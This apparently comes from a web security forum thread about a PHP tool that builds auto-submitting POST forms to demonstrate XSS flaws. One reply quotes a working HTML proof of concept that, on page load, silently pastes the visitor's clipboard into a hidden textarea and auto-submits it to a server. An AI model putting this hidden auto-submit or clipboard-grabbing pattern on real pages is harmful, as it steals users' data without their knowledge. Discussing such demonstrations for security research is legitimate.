Well... it took me a while but how about this:
http://www.whiteacid.org/misc/xss_post_forwarder.php
code is at: http://www.whiteacid.org/misc/xss_post_forwarder.phps

It can't handle radio buttons, and as you can see from the classes, I'd made the classes support any input type, but I hadn't bothered creating the way for users to supply what they want the user type to be. Still... is that what you meant?

Edit: yes, I realise that the referer on the target server will be mine, I don't really care.

I've edited the script a bit. Should make more sense. After I actually used it to show a real XSS I found usability bugs. It now expects the target URL in the xss_target variable, allows empty fields and is less cluttered.

I find it very useful, keep it up. But if I could make one suggestion, it would be to include a textarea with the exploit code in it (including the automatic click event) so people don't have to code that part for themselves. Here's the HTML from http://ha.ckers.org/cutandpaste.html as an example:

<body onload="cutandpaste();">
<form method=post name=f action="cutandpaste.cgi">
<input type="submit" class="button" name="s" style="width=1px;height=1px">
<textarea maxlength=10000 name=clipb style="width=1px;height=1px"></textarea>
</form>
This only works in Internet Explorer. If you are using Firefox, or if you don't have anything in your clipboard this will be a pretty boring demo.
<script>
function cutandpaste() {
document.f.clipb.createTextRange().execCommand("Paste");
document.f.s.click();
}
</script>
</body>

The "document.f.s.click();" part is the part that's particularly interesting here.

Good suggestion. While it could be seen as encouraging exploitation as opposed to showing PoCs, anyone who did want to exploit a flaw shown in the script will already know how to do it anyway, so there's no extra harm in adding the textarea.
I've done it anyway. Also I've extended the width of the input fields, which was really bugging me.